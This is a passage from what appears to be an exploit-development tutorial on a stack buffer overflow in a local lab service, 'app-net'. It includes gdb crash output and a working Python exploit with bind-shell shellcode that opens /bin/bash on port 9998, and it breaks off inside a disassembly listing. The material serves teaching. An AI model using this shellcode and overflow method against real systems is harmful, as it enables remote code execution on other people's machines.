lot about this application, lets try our exploit from last time:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython app-net-fuzz.py /span span class="code-line"span class="go"532/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /spangdb -q ./app-net /span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net /span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython -c span class="s1"#39;print quot;Aquot;*532#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x0804000a in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"r/span/span span class="code-line"span class="go"The program being debugged has been started already./span/span span class="code-line"span class="go"Start it from the beginning? (y or n) y/span/span span class="code-line"span class="go"Starting program: /home/appuser/app-net/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython -c span class="s1"#39;print quot;Aquot;*536#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /span./app-net /span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~# /spanps ax span class="p"|/span grep app-net/span span class="code-line"span class="go"26854 pts/0 S+ 0:00 ./app-net/span/span span class="code-line"span class="go"26951 pts/2 S+ 0:00 grep app-net/span/span span class="code-line"span class="gp"root@dev:~# /spangdb -q -p span class="m"26854/span/span span class="code-line"span class="go"Attaching to process 26854/span/span span class="code-line"span class="go"Reading symbols from /home/appuser/app-net...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Reading symbols from /lib/i386-linux-gnu/i686/cmov/libc.so.6...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Loaded symbols for /lib/i386-linux-gnu/i686/cmov/libc.so.6/span/span span class="code-line"span class="go"Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done./span/span span class="code-line"span class="go"Loaded symbols for /lib/ld-linux.so.2/span/span span class="code-line"span class="go"0xb77c0424 in __kernel_vsyscall ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"c/span/span span class="code-line"span class="go"Continuing./span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython -c span class="s1"#39;print quot;Aquot;*536#39;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Program received signal SIGSEGV, Segmentation fault./span/span span class="code-line"span class="go"0x41414141 in ?? ()/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"x/20xw $esp/span/span span class="code-line"span class="go"0xbfaeb670: 0xbfae000a 0xbfaeb694 0x000003e8 0x00000000/span/span span class="code-line"span class="go"0xbfaeb680: 0xbfaeba80 0xbfaeba7c 0x000057a8 0x00000006/span/span span class="code-line"span class="go"0xbfaeb690: 0x00001000 0x41414141 0x41414141 0x41414141/span/span span class="code-line"span class="go"0xbfaeb6a0: 0x41414141 0x41414141 0x41414141 0x41414141/span/span span class="code-line"span class="go"0xbfaeb6b0: 0x41414141 0x41414141 0x41414141 0x41414141/span/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /span./app-net/span span class="code-line"/code/pre/div /td/tr/table table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spancat app-net-exploit.py /span span class="code-line"span class="gp"#/span!/usr/bin/env python/span span class="code-line"/span span class="code-line"span class="go"import socket/span/span span class="code-line"/span span class="code-line"span class="go"shellcode = quot;\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80quot;/span/span span class="code-line"/span span class="code-line"span class="go"payload = quot;\x90quot; * 406 # (532 - 119) - 7 = 406/span/span span class="code-line"/span span class="code-line"span class="go"payload += shellcode # append our shellcode/span/span span class="code-line"/span span class="code-line"span class="go"payload += quot;\x90quot; * 7 # another 7 bytes/span/span span class="code-line"/span span class="code-line"span class="go"payload += quot;\x94\xb6\xae\xbfquot; # the address of our shellcode/span/span span class="code-line"span class="gp" # /spanspan class="k"in/span reverse span class="o"(/spanlittle endianspan class="o")/span/span span class="code-line"/span span class="code-line"span class="gp"# /spancreate the tcp socket/span span class="code-line"span class="go"s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)/span/span span class="code-line"/span span class="code-line"span class="gp"# /spanconnect to span class="m"127/span.0.0.1 port span class="m"9999/span/span span class="code-line"span class="go"s.connect((quot;127.0.0.1quot;, 9999))/span/span span class="code-line"/span span class="code-line"span class="gp"# /spansend our payload/span span class="code-line"span class="go"s.send(payload)/span/span span class="code-line"/span span class="code-line"span class="gp"# /spanclose the socket/span span class="code-line"span class="go"s.close()/span/span span class="code-line"span class="gp"testuser@dev:~$ /spanpython app-net-exploit.py /span span class="code-line"span class="gp"testuser@dev:~$ /spannc span class="m"127/span.0.0.1 span class="m"9998/span/span span class="code-line"span class="go"nc: unable to connect to address 127.0.0.1, service 9998/span/span span class="code-line"/code/pre/div /td/tr/table pAs you can see, the exploit that we used last time didn't work. The reason for this is because the position of the stack has moved, so the shellcode isn't at the same address everytime the application is launched./p pThe offset here before we start overwriting EIP is 532. I want to explain quickly why this is./p pWe have 3 local variables, codechar p[512];/code (on line 100 of the source) and codeint r, i;/code (on line 101)./p pThese variables go on to the stack in reverse order, so first (closest to the beginning of the a href="https://en.wikipedia.org/wiki/Call_stack#Structure" target="_blank"stack frame/a) codei/code, then coder/code and lastly codep/code./p pWhen writes happen here they happen in the opposite direction, so a write at codep/code will eventually overwrite coder/code (after filling up the reserved space for codep/code) and then codei/code./p pWe are reserving 512 bytes for codep/code, each int is 4 bytes long, so that is 520. The stack has to be aligned to 16 byte boundaries, so we need to add another 8 bytes, making it 528 bytes./p pLastly right under the local variables we have the saved EBP from the calling function, this is another 4 bytes. The return address is stored right after the saved EBP so that takes us to 532 bytes./p h2Returning From A Function/h2 pI explained this in much more detail in part a href="/x86-32-linux/reverse-engineering/2014/07/01/basic-binary-auditing/"4/a but just before a function returns, the stack looks like this:/p pimg src="/assets/images/x86-32-linux/stack2.jpg" width="300"/p pThe strongRET ADDR/strong is what we are overwriting to take control of EIP. What happens next is the strongRET ADDR/strong gets strongpopped/strong off of the stack into the EIP register and the stack then looks like this:/p pimg src="/assets/images/x86-32-linux/stack1.jpg" width="300"/p pThis means that the value of the ESP register will always point to the memory address on the stack right after we overwrite EIP, at 536 bytes into our payload (532 + 4 for EIP)./p pSo if we write our shellcode after we overwrite EIP then we know that ESP is pointing to it./p pAn instruction that is fairly common among all normal sized applications is codejmp esp/code. This instruction tells EIP to point to the address that ESP is pointing to./p pUsing this instruction we can execute our shellcode but first we have to find it in the application's a href="https://en.wikipedia.org/wiki/Code_segment" target="_blank"text segment/a because we know it will never change address if it is in this section./p h2Finding JMP ESP/h2 pFirst let's look at the disassembly using codeobjdump -d ./app-net -M intel/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal" 10/span/span span class="code-line"span class="normal" 11/span/span span class="code-line"span class="normal" 12/span/span span class="code-line"span class="normal" 13/span/span span class="code-line"span class="normal" 14/span/span span class="code-line"span class="normal" 15/span/span span class="code-line"span class="normal" 16/span/span span class="code-line"span class="normal" 17/span/span span class="code-line"span class="normal" 18/span/span span class="code-line"span class="normal" 19/span/span span class="code-line"span class="normal" 20/span/span span class="code-line"span class="normal" 21/span/span span class="code-line"span class="normal" 22/span/span span class="code-line"span class="normal" 23/span/span span class="code-line"span class="normal" 24/span/span span class="code-line"span class="normal" 25/span/span span class="code-line"span class="normal" 26/span/span span class="code-line"span class="normal" 27/span/span span class="code-line"span class="normal" 28/span/span span class="code-line"span class="normal" 29/span/span span class="code-line"span class="normal" 30/span/span span class="code-line"span class="normal" 31/span/span span class="code-line"span class="normal" 32/span/span span class="code-line"span class="normal" 33/span/span span class="code-line"span class="normal" 34/span/span span class="code-line"span class="normal" 35/span/span span class="code-line"span class="normal" 36/span/span span class="code-line"span class="normal" 37/span/span span class="code-line"span class="normal" 38/span/span span class="code-line"span class="normal" 39/span/span span class="code-line"span class="normal" 40/span/span span class="code-line"span class="normal" 41/span/span span class="code-line"span class="normal" 42/span/span span class="code-line"span class="normal" 43/span/span span class="code-line"span class="normal" 44/span/span span class="code-line"span class="normal" 45/span/span span class="code-line"span class="normal" 46/span/span span class="code-line"span class="normal" 47/span/span span class="code-line"span class="normal" 48/span/span span class="code-line"span class="normal" 49/span/span span class="code-line"span class="normal" 50/span/span span class="code-line"span class="normal" 51/span/span span class="code-line"span class="normal" 52/span/span span class="code-line"span class="normal" 53/span/span span class="code-line"span class="normal" 54/span/span span class="code-line"span class="normal" 55/span/span span class="code-line"span class="normal" 56/span/span span class="code-line"span class="normal" 57/span/span span class="code-line"span class="normal" 58/span/span span class="code-line"span class="normal" 59/span/span span class="code-line"span class="normal" 60/span/span span class="code-line"span class="normal" 61/span/span span class="code-line"span class="normal" 62/span/span span class="code-line"span class="normal" 63/span/span span class="code-line"span class="normal" 64/span/span span class="code-line"span class="normal" 65/span/span span class="code-line"span class="normal" 66/span/span span class="code-line"span class="normal" 67/span/span span class="code-line"span class="normal" 68/span/span span class="code-line"span class="normal" 69/span/span span class="code-line"span class="normal" 70/span/span span class="code-line"span class="normal" 71/span/span span class="code-line"span class="normal" 72/span/span span class="code-line"span class="normal" 73/span/span span class="code-line"span class="normal" 74/span/span span class="code-line"span class="normal" 75/span/span span class="code-line"span class="normal" 76/span/span span class="code-line"span class="normal" 77/span/span span class="code-line"span class="normal" 78/span/span span class="code-line"span class="normal" 79/span/span span class="code-line"span class="normal" 80/span/span span class="code-line"span class="normal" 81/span/span span class="code-line"span class="normal" 82/span/span span class="code-line"span class="normal" 83/span/span span class="code-line"span class="normal" 84/span/span span class="code-line"span class="normal" 85/span/span span class="code-line"span class="normal" 86/span/span span class="code-line"span class="normal" 87/span/span span class="code-line"span class="normal" 88/span/span span class="code-line"span class="normal" 89/span/span span class="code-line"span class="normal" 90/span/span span class="code-line"span class="normal" 91/span/span span class="code-line"span class="normal" 92/span/span span class="code-line"span class="normal" 93/span/span span class="code-line"span class="normal" 94/span/span span class="code-line"span class="normal" 95/span/span span class="code-line"span class="normal" 96/span/span span class="code-line"span class="normal" 97/span/span span class="code-line"span class="normal" 98/span/span span class="code-line"span class="normal" 99/span/span span class="code-line"span class="normal"100/span/span span class="code-line"span class="normal"101/span/span span class="code-line"span class="normal"102/span/span span class="code-line"span class="normal"103/span/span span class="code-line"span class="normal"104/span/span span class="code-line"span class="normal"105/span/span span class="code-line"span class="normal"106/span/span span class="code-line"span class="normal"107/span/span span class="code-line"span class="normal"108/span/span span class="code-line"span class="normal"109/span/span span class="code-line"span class="normal"110/span/span span class="code-line"span class="normal"111/span/span span class="code-line"span class="normal"112/span/span span class="code-line"span class="normal"113/span/span span class="code-line"span class="normal"114/span/span span class="code-line"span class="normal"115/span/span span class="code-line"span class="normal"116/span/span span class="code-line"span class="normal"117/span/span span class="code-line"span class="normal"118/span/span span class="code-line"span class="normal"119/span/span span class="code-line"span class="normal"120/span/span span class="code-line"span class="normal"121/span/span span class="code-line"span class="normal"122/span/span span class="code-line"span class="normal"123/span/span span class="code-line"span class="normal"124/span/span span class="code-line"span class="normal"125/span/span span class="code-line"span class="normal"126/span/span span class="code-line"span class="normal"127/span/span span class="code-line"span class="normal"128/span/span span class="code-line"span class="normal"129/span/span span class="code-line"span class="normal"130/span/span span class="code-line"span class="normal"131/span/span span class="code-line"span class="normal"132/span/span span class="code-line"span class="normal"133/span/span span class="code-line"span class="normal"134/span/span span class="code-line"span class="normal"135/span/span span class="code-line"span class="normal"136/span/span span class="code-line"span class="normal"137/span/span span class="code-line"span class="normal"138/span/span span class="code-line"span class="normal"139/span/span span class="code-line"span class="normal"140/span/span span class="code-line"span class="normal"141/span/span span class="code-line"span class="normal"142/span/span span class="code-line"span class="normal"143/span/span span class="code-line"span class="normal"144/span/span span class="code-line"span class="normal"145/span/span span class="code-line"span class="normal"146/span/span span class="code-line"span class="normal"147/span/span span class="code-line"span class="normal"148/span/span span class="code-line"span class="normal"149/span/span span class="code-line"span class="normal"150/span/span span class="code-line"span class="normal"151/span/span span class="code-line"span class="normal"152/span/span span class="code-line"span class="normal"153/span/span span class="code-line"span class="normal"154/span/span span class="code-line"span class="normal"155/span/span span class="code-line"span class="normal"156/span/span span class="code-line"span class="normal"157/span/span span class="code-line"span class="normal"158/span/span span class="code-line"span class="normal"159/span/span span class="code-line"span class="normal"160/span/span span class="code-line"span class="normal"161/span/span span class="code-line"span class="normal"162/span/span span class="code-line"span class="normal"163/span/span span class="code-line"span class="normal"164/span/span span class="code-line"span class="normal"165/span/span span class="code-line"span class="normal"166/span/span span class="code-line"span class="normal"167/span/span span class="code-line"span class="normal"168/span/span span class="code-line"span class="normal"169/span/span span class="code-line"span class="normal"170/span/span span class="code-line"span class="normal"171/span/span span class="code-line"span class="normal"172/span/span span class="code-line"span class="normal"173/span/span span class="code-line"span class="normal"174/span/span span class="code-line"span class="normal"175/span/span span class="code-line"span class="normal"176/span/span span class="code-line"span class="normal"177/span/span span class="code-line"span class="normal"178/span/span span class="code-line"span class="normal"179/span/span span class="code-line"span class="normal"180/span/span span class="code-line"span class="normal"181/span/span span class="code-line"span class="normal"182/span/span span class="code-line"span class="normal"183/span/span span class="code-line"span class="normal"184/span/span span class="code-line"span class="normal"185/span/span span class="code-line"span class="normal"186/span/span span class="code-line"span class="normal"187/span/span span class="code-line"span class="normal"188/span/span span class="code-line"span class="normal"189/span/span span class="code-line"span class="normal"190/span/span span class="code-line"span class="normal"191/span/span span class="code-line"span class="normal"192/span/span span class="code-line"span class="normal"193/span/span span class="code-line"span class="normal"194/span/span span class="code-line"span class="normal"195/span/span span class="code-line"span class="normal"196/span/span span class="code-line"span class="normal"197/span/span span class="code-line"span class="normal"198/span/span span class="code-line"span class="normal"199/span/span span class="code-line"span class="normal"200/span/span span class="code-line"span class="normal"201/span/span span class="code-line"span class="normal"202/span/span span class="code-line"span class="normal"203/span/span span class="code-line"span class="normal"204/span/span span class="code-line"span class="normal"205/span/span span class="code-line"span class="normal"206/span/span span class="code-line"span class="normal"207/span/span span class="code-line"span class="normal"208/span/span span class="code-line"span class="normal"209/span/span span class="code-line"span class="normal"210/span/span span class="code-line"span class="normal"211/span/span span class="code-line"span class="normal"212/span/span span class="code-line"span class="normal"213/span/span span class="code-line"span class="normal"214/span/span span class="code-line"span class="normal"215/span/span span class="code-line"span class="normal"216/span/span span class="code-line"span class="normal"217/span/span span class="code-line"span class="normal"218/span/span span class="code-line"span class="normal"219/span/span span class="code-line"span class="normal"220/span/span span class="code-line"span class="normal"221/span/span span class="code-line"span class="normal"222/span/span span class="code-line"span class="normal"223/span/span span class="code-line"span class="normal"224/span/span span class="code-line"span class="normal"225/span/span span class="code-line"span class="normal"226/span/span span class="code-line"span class="normal"227/span/span span class="code-line"span class="normal"228/span/span span class="code-line"span class="normal"229/span/span span class="code-line"span class="normal"230/span/span span class="code-line"span class="normal"231/span/span span class="code-line"span class="normal"232/span/span span class="code-line"span class="normal"233/span/span span class="code-line"span class="normal"234/span/span span class="code-line"span class="normal"235/span/span span class="code-line"span class="normal"236/span/span span class="code-line"span class="normal"237/span/span span class="code-line"span class="normal"238/span/span span class="code-line"span class="normal"239/span/span span class="code-line"span class="normal"240/span/span span class="code-line"span class="normal"241/span/span span class="code-line"span class="normal"242/span/span span class="code-line"span class="normal"243/span/span span class="code-line"span class="normal"244/span/span span class="code-line"span class="normal"245/span/span span class="code-line"span class="normal"246/span/span span class="code-line"span class="normal"247/span/span span class="code-line"span class="normal"248/span/span span class="code-line"span class="normal"249/span/span span class="code-line"span class="normal"250/span/span span class="code-line"span class="normal"251/span/span span class="code-line"span class="normal"252/span/span span class="code-line"span class="normal"253/span/span span class="code-line"span class="normal"254/span/span span class="code-line"span class="normal"255/span/span span class="code-line"span class="normal"256/span/span span class="code-line"span class="normal"257/span/span span class="code-line"span class="normal"258/span/span span class="code-line"span class="normal"259/span/span span class="code-line"span class="normal"260/span/span span class="code-line"span class="normal"261/span/span span class="code-line"span class="normal"262/span/span span class="code-line"span class="normal"263/span/span span class="code-line"span class="normal"264/span/span span class="code-line"span class="normal"265/span/span span class="code-line"span class="normal"266/span/span span class="code-line"span class="normal"267/span/span span class="code-line"span class="normal"268/span/span span class="code-line"span class="normal"269/span/span span class="code-line"span class="normal"270/span/span span class="code-line"span class="normal"271/span/span span class="code-line"span class="normal"272/span/span span class="code-line"span class="normal"273/span/span span class="code-line"span class="normal"274/span/span span class="code-line"span class="normal"275/span/span span class="code-line"span class="normal"276/span/span span class="code-line"span class="normal"277/span/span span class="code-line"span class="normal"278/span/span span class="code-line"span class="normal"279/span/span span class="code-line"span class="normal"280/span/span span class="code-line"span class="normal"281/span/span span class="code-line"span class="normal"282/span/span span class="code-line"span class="normal"283/span/span span class="code-line"span class="normal"284/span/span span class="code-line"span class="normal"285/span/span span class="code-line"span class="normal"286/span/span span class="code-line"span class="normal"287/span/span span class="code-line"span class="normal"288/span/span span class="code-line"span class="normal"289/span/span span class="code-line"span class="normal"290/span/span span class="code-line"span class="normal"291/span/span span class="code-line"span class="normal"292/span/span span class="code-line"span class="normal"293/span/span span class="code-line"span class="normal"294/span/span span class="code-line"span class="normal"295/span/span span class="code-line"span class="normal"296/span/span span class="code-line"span class="normal"297/span/span span class="code-line"span class="normal"298/span/span span class="code-line"span class="normal"299/span/span span class="code-line"span class="normal"300/span/span span class="code-line"span class="normal"301/span/span span class="code-line"span class="normal"302/span/span span class="code-line"span class="normal"303/span/span span class="code-line"span class="normal"304/span/span span class="code-line"span class="normal"305/span/span span class="code-line"span class="normal"306/span/span span class="code-line"span class="normal"307/span/span span class="code-line"span class="normal"308/span/span span class="code-line"span class="normal"309/span/span span class="code-line"span class="normal"310/span/span span class="code-line"span class="normal"311/span/span span class="code-line"span class="normal"312/span/span span class="code-line"span class="normal"313/span/span span class="code-line"span class="normal"314/span/span span class="code-line"span class="normal"315/span/span span class="code-line"span class="normal"316/span/span span class="code-line"span class="normal"317/span/span span class="code-line"span class="normal"318/span/span span class="code-line"span class="normal"319/span/span span class="code-line"span class="normal"320/span/span span class="code-line"span class="normal"321/span/span span class="code-line"span class="normal"322/span/span span class="code-line"span class="normal"323/span/span span class="code-line"span class="normal"324/span/span span class="code-line"span class="normal"325/span/span span class="code-line"span class="normal"326/span/span span class="code-line"span class="normal"327/span/span span class="code-line"span class="normal"328/span/span span class="code-line"span class="normal"329/span/span span class="code-line"span class="normal"330/span/span span class="code-line"span class="normal"331/span/span span class="code-line"span class="normal"332/span/span span class="code-line"span class="normal"333/span/span span class="code-line"span class="normal"334/span/span span class="code-line"span class="normal"335/span/span span class="code-line"span class="normal"336/span/span span class="code-line"span class="normal"337/span/span span class="code-line"span class="normal"338/span/span span class="code-line"span class="normal"339/span/span span class="code-line"span class="normal"340/span/span span class="code-line"span class="normal"341/span/span span class="code-line"span class="normal"342/span/span span class="code-line"span class="normal"343/span/span span class="code-line"span class="normal"344/span/span span class="code-line"span class="normal"345/span/span span class="code-line"span class="normal"346/span/span span class="code-line"span class="normal"347/span/span span class="code-line"span class="normal"348/span/span span class="code-line"span class="normal"349/span/span span class="code-line"span class="normal"350/span/span span class="code-line"span class="normal"351/span/span span class="code-line"span class="normal"352/span/span span class="code-line"span class="normal"353/span/span span class="code-line"span class="normal"354/span/span span class="code-line"span class="normal"355/span/span span class="code-line"span class="normal"356/span/span span class="code-line"span class="normal"357/span/span span class="code-line"span class="normal"358/span/span span class="code-line"span class="normal"359/span/span span class="code-line"span class="normal"360/span/span span class="code-line"span class="normal"361/span/span span class="code-line"span class="normal"362/span/span span class="code-line"span class="normal"363/span/span span class="code-line"span class="normal"364/span/span span class="code-line"span class="normal"365/span/span span class="code-line"span class="normal"366/span/span span class="code-line"span class="normal"367/span/span span class="code-line"span class="normal"368/span/span span class="code-line"span class="normal"369/span/span span class="code-line"span class="normal"370/span/span span class="code-line"span class="normal"371/span/span span class="code-line"span class="normal"372/span/span span class="code-line"span class="normal"373/span/span span class="code-line"span class="normal"374/span/span span class="code-line"span class="normal"375/span/span span class="code-line"span class="normal"376/span/span span class="code-line"span class="normal"377/span/span span class="code-line"span class="normal"378/span/span span class="code-line"span class="normal"379/span/span span class="code-line"span class="normal"380/span/span span class="code-line"span class="normal"381/span/span span class="code-line"span class="normal"382/span/span span class="code-line"span class="normal"383/span/span span class="code-line"span class="normal"384/span/span span class="code-line"span class="normal"385/span/span span class="code-line"span class="normal"386/span/span span class="code-line"span class="normal"387/span/span span class="code-line"span class="normal"388/span/span span class="code-line"span class="normal"389/span/span span class="code-line"span class="normal"390/span/span span class="code-line"span class="normal"391/span/span span class="code-line"span class="normal"392/span/span span class="code-line"span class="normal"393/span/span span class="code-line"span class="normal"394/span/span span class="code-line"span class="normal"395/span/span span class="code-line"span class="normal"396/span/span span class="code-line"span class="normal"397/span/span span class="code-line"span class="normal"398/span/span span class="code-line"span class="normal"399/span/span span class="code-line"span class="normal"400/span/span span class="code-line"span class="normal"401/span/span span class="code-line"span class="normal"402/span/span span class="code-line"span class="normal"403/span/span span class="code-line"span class="normal"404/span/span span class="code-line"span class="normal"405/span/span span class="code-line"span class="normal"406/span/span span class="code-line"span class="normal"407/span/span span class="code-line"span class="normal"408/span/span span class="code-line"span class="normal"409/span/span span class="code-line"span class="normal"410/span/span span class="code-line"span class="normal"411/span/span span class="code-line"span class="normal"412/span/span span class="code-line"span class="normal"413/span/span span class="code-line"span class="normal"414/span/span span class="code-line"span class="normal"415/span/span span class="code-line"span class="normal"416/span/span span class="code-line"span class="normal"417/span/span span class="code-line"span class="normal"418/span/span span class="code-line"span class="normal"419/span/span span class="code-line"span class="normal"420/span/span span class="code-line"span class="normal"421/span/span span class="code-line"span class="normal"422/span/span span class="code-line"span class="normal"423/span/span span class="code-line"span class="normal"424/span/span span class="code-line"span class="normal"425/span/span span class="code-line"span class="normal"426/span/span span class="code-line"span class="normal"427/span/span span class="code-line"span class="normal"428/span/span span class="code-line"span class="normal"429/span/span span class="code-line"span class="normal"430/span/span span class="code-line"span class="normal"431/span/span span class="code-line"span class="normal"432/span/span span class="code-line"span class="normal"433/span/span span class="code-line"span class="normal"434/span/span span class="code-line"span class="normal"435/span/span span class="code-line"span class="normal"436/span/span span class="code-line"span class="normal"437/span/span span class="code-line"span class="normal"438/span/span span class="code-line"span class="normal"439/span/span span class="code-line"span class="normal"440/span/span span class="code-line"span class="normal"441/span/span span class="code-line"span class="normal"442/span/span span class="code-line"span class="normal"443/span/span span class="code-line"span class="normal"444/span/span span class="code-line"span class="normal"445/span/span span class="code-line"span class="normal"446/span/span span class="code-line"span class="normal"447/span/span span class="code-line"span class="normal"448/span/span span class="code-line"span class="normal"449/span/span span class="code-line"span class="normal"450/span/span span class="code-line"span class="normal"451/span/span span class="code-line"span class="normal"452/span/span span class="code-line"span class="normal"453/span/span span class="code-line"span class="normal"454/span/span span class="code-line"span class="normal"455/span/span span class="code-line"span class="normal"456/span/span span class="code-line"span class="normal"457/span/span span class="code-line"span class="normal"458/span/span span class="code-line"span class="normal"459/span/span span class="code-line"span class="normal"460/span/span span class="code-line"span class="normal"461/span/span span class="code-line"span class="normal"462/span/span span class="code-line"span class="normal"463/span/span span class="code-line"span class="normal"464/span/span span class="code-line"span class="normal"465/span/span span class="code-line"span class="normal"466/span/span span class="code-line"span class="normal"467/span/span span class="code-line"span class="normal"468/span/span span class="code-line"span class="normal"469/span/span span class="code-line"span class="normal"470/span/span span class="code-line"span class="normal"471/span/span span class="code-line"span class="normal"472/span/span span class="code-line"span class="normal"473/span/span span class="code-line"span class="normal"474/span/span span class="code-line"span class="normal"475/span/span span class="code-line"span class="normal"476/span/span span class="code-line"span class="normal"477/span/span span class="code-line"span class="normal"478/span/span span class="code-line"span class="normal"479/span/span span class="code-line"span class="normal"480/span/span span class="code-line"span class="normal"481/span/span span class="code-line"span class="normal"482/span/span span class="code-line"span class="normal"483/span/span span class="code-line"span class="normal"484/span/span span class="code-line"span class="normal"485/span/span span class="code-line"span class="normal"486/span/span span class="code-line"span class="normal"487/span/span span class="code-line"span class="normal"488/span/span span 